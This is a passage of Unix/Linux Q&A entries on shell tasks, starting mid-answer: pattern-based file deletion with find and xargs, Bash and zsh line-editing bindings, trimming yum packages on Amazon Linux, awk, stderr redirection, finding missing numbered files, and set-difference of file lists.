    $ tree
    .
    ├── index.php
    ├── keppme.php
    └── level1
        ├── index.php
        ├── keepme.php
        └── level2
            ├── index.php
            └── keepme.php

Instead of the -delete option you can also use xargs to delete files in parallel. For a big collection of files this can sometimes speed up the whole process, but not always. This runs rm on every core/CPU with at most 100 files per rm invocation:

    $ find . -type f -name 'index.php.*' -print0 | xargs -r0 -P $(nproc) -n 100 rm
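Before running any of these against real data, it's worth rehearsing in a scratch directory: swap -delete for -print to see what would go, then delete and count the survivors. This sketch uses mktemp so nothing outside the sandbox is touched.

```shell
# Build a disposable sandbox mirroring the layout above.
dir=$(mktemp -d)
mkdir -p "$dir/level1"
touch "$dir/index.php" "$dir/index.php.bar" "$dir/keepme.php" \
      "$dir/level1/index.php" "$dir/level1/index.php.l1"

# Dry run: -print instead of -delete lists what WOULD be removed.
find "$dir" -type f -name 'index.php*' -print

# The real thing, then count what survived.
find "$dir" -type f -name 'index.php*' -delete
survivors=$(find "$dir" -type f | wc -l)
echo "$survivors"   # only keepme.php is left
rm -r "$dir"
```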
Removing multiple files with same prefix (argument list too long)
1,373,893,866,000
Return runs the command and clears the command line. Is it possible to skip the clearing part, so the command is executed but the command line and cursor position are preserved and you can keep editing it? The alternative is to recall the command from history, but that takes more keystrokes and loses the cursor position.
You could use the builtin bind to get the current line buffer and evaluate it on a given shortcut, for example to bind it to Ctrl+j:

    bind -x '"\C-j": eval "$READLINE_LINE"'

Just tested superficially, use it at your own risk ;) The readline function operate-and-get-next is close to what you want but not exactly that.
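Outside an interactive session you can simulate what that handler does: readline hands the current buffer to the handler in READLINE_LINE, the handler evals it, and because the handler never clears the variable, the line stays in place for further editing. A non-interactive sketch of just that mechanism:

```shell
# Pretend this is the buffer the user has typed so far.
READLINE_LINE='echo hello from the buffer'

# This is what the Ctrl+j handler executes:
eval "$READLINE_LINE"

# The buffer is untouched, so the user could keep editing it afterwards.
printf '%s\n' "$READLINE_LINE"
```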
Run command and keep editing it in Bash
1,373,893,866,000
In emacs, there is this shortcut:

    M-\    Delete spaces and tabs around point (delete-horizontal-space).

https://www.gnu.org/software/emacs/manual/html_node/emacs/Deletion.html

It also works in bash. Is there an equivalent in zsh, or how can I define one?
I don't think there is, but you can always write it yourself as:

    delete-horizontal-space() {
      emulate -L zsh
      set -o extendedglob
      LBUFFER=${LBUFFER%%[[:blank:]]##}
      RBUFFER=${RBUFFER##[[:blank:]]##}
    }
    zle -N delete-horizontal-space
    bindkey '\e\\' delete-horizontal-space
is there a shortcut to delete spaces and tabs around a point in zsh
1,373,893,866,000
I recently switched from bash to zsh. One (annoying) difference is that when I do Esc-K (in vi editing mode) to move back in command-line history, the cursor is placed at the end of the line initially. I want it to be at the beginning of the line initially. How can I get what I want?
For some reason, the default mappings for j and k in the vicmd keymap are:

    "j" down-line-or-history
    "k" up-line-or-history

Remapping them as follows should make them work the way you want:

    bindkey -a j vi-down-line-or-history
    bindkey -a k vi-up-line-or-history
zsh: history with cursor at beginning of line
1,373,893,866,000
I use EC2 on Amazon Web Services. The OS of the t2.micro instance is a customized “Amazon Linux” with 1 GiB RAM and 1 vCPU. When accessing this instance via their Cloud9 IDE I find that by default already 73% of the available file space (7.8G on /dev/xvda1) is occupied, and I can only use the remaining 2.2G. My requirements: I need to execute a Python script and write output data locally. I can do without GUI since I am working on the command line. What components of their OS can be safely removed in order to free up some space?
1. Remove dispensable packages

Amazon Linux instances manage their software using the yum package manager. The yum package manager can install, remove, and update software, as well as manage all of the dependencies for each package. – Managing Software on Your Linux Instance

I executed the following to produce a list of the 20 largest packages in the system:

    rpm -qa --queryformat '%10{size} - %-25{name} \t %{version}\n' | sort -nr | head -n 20

To remove packages with all of their dependencies I then installed the yum plugin remove-with-leaves and repeatedly removed the largest packages (including dependencies) which I deemed dispensable (see below for the list):

    sudo yum remove package_name --remove-leaves

2. Remove the obsolete kernel

Identified the current kernel:

    uname -mrs

Listed all kernels:

    rpm -q kernel

Manually removed the obsolete Linux kernel:

    sudo yum remove kernel-4.9.76-3.78.amzn1.x86_64

3. Remove unused packages

Identified packages that can be removed without affecting anything else (in Debian-speak these are called "orphaned packages") and removed them quietly:

    sudo package-cleanup --quiet --leaves | sudo xargs -l1 yum -y remove

Findings

While I am actively only using Python 3.6.5 it is not possible to remove the default Python (2.7.14).

Python is required by many of the Linux distributions. Many system utilities the distro providers combine (both GUI based and not), are programmed in Python. The version of python the system utilities are programmed in I will call the "main" python. [...] Because of the system utilities that are written in python it is impossible to remove the main python without breaking the system. – How to yum remove Python gracefully?

Space occupied by python27 packages amounts to 115819035 bytes (~116 MB).

Results

A total of ~0.5 GB was reclaimed (7% of disk space on /dev/xvda1).
214 packages with a total of 633427867 bytes were removed: java-1.7.0-openjdk emacs-common mysql55-server java-1.7.0-openjdk-devel git mysql55 vim-common perl compat-libicu4 aws-apitools-ec2 emacs v8 ruby20-libs perl-Encode nodejs-devel aws-apitools-elb aws-apitools-as nodejs aws-apitools-mon perl-DBD-SQLite dejavu-sans-fonts subversion subversion-libs subversion-perl python36-devel dejavu-serif-fonts vim-enhanced libtool autoconf perl-DBI rubygem20-rdoc automake libX11-common perl-libs gyp cvs libX11 git-svn alsa-lib gnutls dejavu-sans-mono-fonts perl-Net-SSLeay npm libyaml-devel xorg-x11-fonts-Type1 perl-IO-Compress rsync libxcb libpng perl-Test-Harness rubygems20 perl-Pod-Simple fontconfig aws-amitools-ec2 lcms2 perl-DBD-MySQL55 git-cvs xorg-x11-font-utils libXfont perl-podlators perl-IO-Socket-SSL git-p4 v8-devel perl-YAML perl-Storable rubygem20-json perl-Git-SVN perl-PathTools nodejs-hawk perl-Pod-Perldoc ruby20-irb perl-File-Temp libuv-devel libserf system-rpm-config autogen-libopts perl-Getopt-Long perl-Compress-Raw-Zlib perl-Filter perl-GSSAPI dejavu-fonts-common libuv perl-Net-Daemon libICE cvsps perl-Socket rubygem20-psych perl-Digest-SHA git-email perl-Authen-SASL ttmkfdir perl-HTTP-Tiny perl-Data-Dumper nodejs-ctype perl-threads emacs-git perl-Time-HiRes perl-IO-Socket-IP libXext giflib rubygem20-bigdecimal libSM nodejs-async perl-threads-shared perl-PlRPC nodejs-hoek node-gyp libXi perl-Git nodejs-request nodejs-fstream perl-Scalar-List-Utils ruby20 nodejs-mime perl-Exporter perl-TermReadKey perl-Compress-Raw-Bzip2 nodejs-tar perl-Digest-MD5 perl-File-Path perl-Error http-parser perl-Net-LibIDN perl-Pod-Usage perl-Time-Local libfontenc libXrender libXau nodejs-npm-registry-client nodejs-minimatch nodejs-boom nodejs-http-signature nodejs-semver libXcomposite nodejs-glob nodejs-nopt perl-Digest perl-Carp libXtst perl-Thread-Queue nodejs-npmconf libffi-devel perl-constant gpm-libs perl-Pod-Escapes nodejs-normalize-package-data nodejs-packaging 
nodejs-read-package-json nodejs-promzard nodejs-lockfile nodejs-asn1 nodejs-ansi perl-Text-ParseWords copy-jdk-configs nodejs-form-data nodejs-sntp nodejs-fstream-npm nodejs-node-uuid nodejs-config-chain perl-Digest-HMAC nodejs-retry nodejs-graceful-fs nodejs-sigmund nodejs-npmlog http-parser-devel nodejs-read-installed nodejs-lru-cache nodejs-init-package-json nodejs-qs nodejs-slide nodejs-combined-stream nodejs-assert-plus nodejs-fstream-ignore nodejs-block-stream perl-parent nodejs-delayed-stream nodejs-ini nodejs-sha nodejs-cmd-shim nodejs-tunnel-agent nodejs-mute-stream nodejs-rimraf nodejs-read nodejs-osenv nodejs-mkdirp perl-macros nodejs-which nodejs-abbrev perl-Net-SMTP-SSL nodejs-archy nodejs-uid-number nodejs-aws-sign nodejs-forever-agent nodejs-opener nodejs-json-stringify-safe nodejs-proto-list nodejs-cryptiles nodejs-editor nodejs-child-process-close nodejs-github-url-from-git nodejs-cookie-jar nodejs-npm-user-validate nodejs-chmodr nodejs-chownr nodejs-once nodejs-inherits aws-apitools-common mysql-config vim-filesystem ruby git-all fontpackages-filesystem

Resources

- Amazon Linux AMI
- Amazon Linux AMI 2018.03 Release Notes
- GAD3R's answer to "How to remove all installed dependent packages while removing a package in CentOS 7?"
- How to remove old unused kernels on CentOS Linux
- jtoscarson's answer to "Remove unused packages"
- Owen Fraser-Green's answer to "How can I remove orphan packages in Fedora?"
How to trim down Amazon Linux OS for more free space?
1,373,893,866,000
I have to find the symbolic link which contains the longest folder name in a folder full of symbolic links. So far I have this:

    find <folder> -type l -printf "%l\n"

I was wondering if there's any way to save the folder names while searching, something like this pseudocode:

    if [length > max] {
        max = length
        var = link
    }

Thanks :)
    find /path/to/base -type l |
      awk -F/ 'BEGIN { maxlength = 0; longest = "" }
               length( $NF ) > maxlength { maxlength = length( $NF ); longest = $NF }
               END { print "longest was", longest, "at", maxlength, "characters." }'

To make the awk more readable:

    BEGIN {
        maxlength = 0
        longest = ""
    }
    length( $NF ) > maxlength {
        maxlength = length( $NF )
        longest = $NF
    }
    END {
        print "longest was", longest, "at", maxlength, "characters."
    }

awk is great at dealing with delimited data. Since paths are delimited by /s, we use that as the field separator (with the -F switch), track the longest name we've seen in the longest variable, and its length in the maxlength variable. Some care and feeding to make the output sane if no links are found I shall leave as an exercise for the reader.
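You can sanity-check the awk program without touching any real directory by feeding it a few fabricated paths on stdin:

```shell
# Fabricated link paths stand in for the find output.
out=$(printf '%s\n' ./a/short ./b/muchlongername ./c/mid |
      awk -F/ 'BEGIN { maxlength = 0; longest = "" }
               length( $NF ) > maxlength { maxlength = length( $NF ); longest = $NF }
               END { print "longest was", longest, "at", maxlength, "characters." }')
echo "$out"
```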
Find the longest file name
1,373,893,866,000
Basically, I want to open the current folder I'm in from the terminal. I do gnome-open . from a terminal and this opens the current folder I'm in. In my .bashrc, I have a simple function called open that does this for me:

    function open() {
        gnome-open .
    }

So I just call open, and it works. The only issue is that I get a bunch of warning messages when I do this:

    (nautilus:414): GLib-GIO-CRITICAL **: g_dbus_interface_skeleton_unexport: assertion 'interface_->priv->connections != NULL' failed
    (nautilus:414): GLib-GIO-CRITICAL **: g_dbus_interface_skeleton_unexport: assertion 'interface_->priv->connections != NULL' failed
    (nautilus:414): Gtk-CRITICAL **: gtk_icon_theme_get_for_screen: assertion 'GDK_IS_SCREEN (screen)' failed
    (nautilus:414): GLib-GObject-WARNING **: invalid (NULL) pointer instance
    (nautilus:414): GLib-GObject-CRITICAL **: g_signal_connect_object: assertion 'G_TYPE_CHECK_INSTANCE (instance)' failed

I don't really care about the warning messages, I just don't want to see them in the terminal. How can I hide warning messages that come from calling open?

    function open() {
        gnome-open .
        [ignore all warnings, just do what you're asked]
    }
In case anyone wanted to know, I simply changed my function to redirect the error output. Now it becomes:

    function open() {
        gnome-open . &>/dev/null
    }
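For reference, &> is a bashism; the portable spelling is >/dev/null 2>&1, and redirecting only stderr (2>/dev/null) keeps any useful stdout. A small demonstration with a stand-in noisy command:

```shell
# Stand-in for gnome-open: useful stdout plus warning noise on stderr.
noisy() {
    echo "useful output"
    echo "GLib-GIO-CRITICAL **: some warning" >&2
}

# Drop only the warnings, keep stdout:
kept=$(noisy 2>/dev/null)
echo "$kept"

# Drop everything (portable equivalent of &>/dev/null):
noisy >/dev/null 2>&1
```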
How do I hide warning messages that come from a specific command?
1,373,893,866,000
I have a lot of files that start with numbers and are then hyphenated with descriptions. For example:

    001 - awesomesauce
    216 - stillawesomesauce

They are organized by subdirectory. So how would I, using a bash script or some built-in, look inside those directories to see if I am missing a number in the sequence? I.e. report back that I am missing 002, 128, etc. in the above example. I know I can ls {000..216}\ -* and it will list the files and throw an error if one doesn't exist, but is there a better way to get JUST the missing files, and to do it recursively?
On a GNU setup you could run:

    myarr=( $(find . -type f -name '[0-9][0-9][0-9]*' -printf '%f\n' | cut -c1-3 | sort -n) )
    join -v1 <(seq -w ${myarr[-1]}) <(printf '%s\n' ${myarr[@]})

Alternatively, with zsh, you could try something like this:

    myarr=( **/[0-9][0-9][0-9]*(.one_'REPLY=${${REPLY:t}:0:3}'_) )
    mynums=( {001..$myarr[-1]} )
    print -l ${mynums:|myarr}

It extracts the numbers (the first three digits) from each file name, sorts them and saves the result in an array, myarr. It then sets another array, mynums, containing numbers from 001 up to the value of the last index (i.e. the highest number extracted from the file names) and then uses parameter expansion to remove the values in myarr from the expansion of mynums.
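The join/seq idea can be rehearsed on toy data. Here we pretend only 001, 003 and 004 exist out of an expected 001-005, and use comm -23 (on sorted input) to print the expected numbers that have no counterpart; printf '%03d\n' does the zero-padding portably.

```shell
# Numbers extracted from existing file names (already sorted).
printf '%s\n' 001 003 004 > /tmp/present.txt

# Full expected range, zero-padded (GNU "seq -w 005" would also work).
printf '%03d\n' $(seq 1 5) > /tmp/expected.txt

# Lines only in the first (expected) file are the missing numbers.
missing=$(comm -23 /tmp/expected.txt /tmp/present.txt)
echo "$missing"
```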
List missing file names in a pattern
1,373,893,866,000
Simplified down, I want to write a shell function which runs a program in a new window. For applications like emacs, firefox, gitk that can look like this:

    myopen() {
        "$@"
    }

But I want applications which run in the terminal to open in a new terminal, e.g. for alsamixer, vim, bash, zsh it should look like:

    myopen() {
        urxvt -e "$@"
    }

I have seen that .desktop files contain the information whether they should run in a terminal (for vim / gvim):

    [Desktop Entry]
    Name=Vim
    GenericName=Text Editor
    TryExec=vim
    Exec=vim %F
    Terminal=true

or

    [Desktop Entry]
    Name=GVim
    GenericName=Text Editor
    TryExec=gvim
    Exec=gvim -f %F
    Terminal=false

Is there an existing interface to query the Terminal field (i.e. without using locate and grep to find the .desktop file and parsing it)? So in quasi-code I want to fill the gap in:

    myopen() {
        TERMINALFIELD=$(xdg-app-uses-terminal "$1")   # this line is made up
        if [[ $TERMINALFIELD == true ]]; then
            urxvt -e "$@"
        else
            "$@"
        fi
        return $?
    }
It looks like gtk-launch will do what you want. It will launch an application using the information in the .desktop file. Here is some relevant information from the man page:

    gtk-launch takes at least one argument, the name of the application to launch. The name should match the application desktop file name, as residing in /usr/share/applications, with or without the '.desktop' suffix.
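If gtk-launch isn't available, reading the Terminal= field yourself is only a grep away. The sketch below builds a sample .desktop file to parse; on a real system you'd point it at /usr/share/applications/$app.desktop, and a robust version should also search $XDG_DATA_DIRS and restrict the match to the [Desktop Entry] section, which this deliberately skips.

```shell
# Sample .desktop file standing in for a real one.
cat > /tmp/demo.desktop <<'EOF'
[Desktop Entry]
Name=Vim
Exec=vim %F
Terminal=true
EOF

needs_terminal() {
    # Naive: assumes Terminal= appears once, inside [Desktop Entry].
    grep -q '^Terminal=true' "$1"
}

if needs_terminal /tmp/demo.desktop; then
    echo "run in urxvt -e"
else
    echo "run directly"
fi
```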
determine (in script) if command runs in terminal (from desktop file?)
1,373,893,866,000
Recently, I was backing up a directory tree using cp -r, when I ran out of space on the receiving drive. I had to carry on with the backup, but to a different destination. Normally, to resume a cp command, you would ask cp to only copy a file if it isn't already in the destination. You can see the problem here. Here was my solution:

Screw up:

    # cp -rv sourcedir destdir
    error: no space left on device.

Make a list of all files that had been copied successfully:

    # cd destdir
    # find . >/tmp/alreadycopied

Write a script that could take any list A and a blacklist B and return a new list C = A \ B, containing every element in A that is not in B. I called it setminus:

    ***generate list A*** | setminus listB

returns C to stdout.

Use find and setminus to copy all remaining files to the new destination:

    # cd sourcedir
    # find . -type f | setminus /tmp/alreadycopied | xargs -d '\n' -I file cp -v --parents file overflowdestdir

It worked, but I figure this set minus of lists is a common enough problem that the standard UNIX tools must somehow cover this use case, making my script unnecessary. Have any of you run into this problem, and if so, how did you solve it?

The setminus script:

    #!/usr/bin/env python3
    # ***generate list*** | setminus blacklist
    #
    # Performs a set minus on its inputs and returns the result. Specifically,
    # filters a newline-separated list in stdin using blacklist---also a
    # newline-separated list. If an element of stdin is found in blacklist, it is
    # excluded from the output. Otherwise, the element is returned to stdout. Very
    # useful in conjunction with find commands.
    from sys import *

    try:
        blacklistfile = argv[1]
    except IndexError:
        stderr.write('usage: ***generate list*** | setminus blacklist.\n')
        exit(1)

    # A dict is used instead of a list to speed up searching. This blacklist
    # could potentially be very large!
    blacklist = {}
    for line in open(blacklistfile):
        blacklist[line] = True

    for line in stdin:
        inblacklist = False
        try:
            inblacklist = blacklist[line]
        except KeyError:
            pass
        if not inblacklist:
            stdout.write(line)
If your lists are sorted you could use comm -23 to get the elements unique to the first list. If they are not, you could use grep like:

    find . -type f | grep -vFxf /tmp/alreadyCopied

where:

    -v                     find all the lines without a match
    -F                     use the strings as fixed strings, not as patterns
    -x                     match the whole line instead of the string anywhere in the line
    -f /tmp/alreadyCopied  read the lines to match from the given file

You'll have to make sure the paths match though, so if find is producing ./dir1/file1 that needs to be the same string in /tmp/alreadyCopied.

Do note though, that this general approach will have problems if, say, you have a filename with \n in it. You could probably redo the whole thing within find with something like:

    find . -type f -exec test ! -f destdir/{} \; -exec cp -v --parents {} overflowdestdir \;
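A self-contained rehearsal of the grep -vFxf approach on toy lists (with the same caveat that newline-containing file names would break it):

```shell
# What the source tree contains...
printf '%s\n' ./a ./b ./c ./d > /tmp/all.txt
# ...and what was already copied.
printf '%s\n' ./b ./d > /tmp/copied.txt

# Whole-line, fixed-string, inverted match: paths still left to copy.
remaining=$(grep -vFxf /tmp/copied.txt /tmp/all.txt)
echo "$remaining"
```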
Set minus of two newline-terminated lists / generic blacklisting using common household items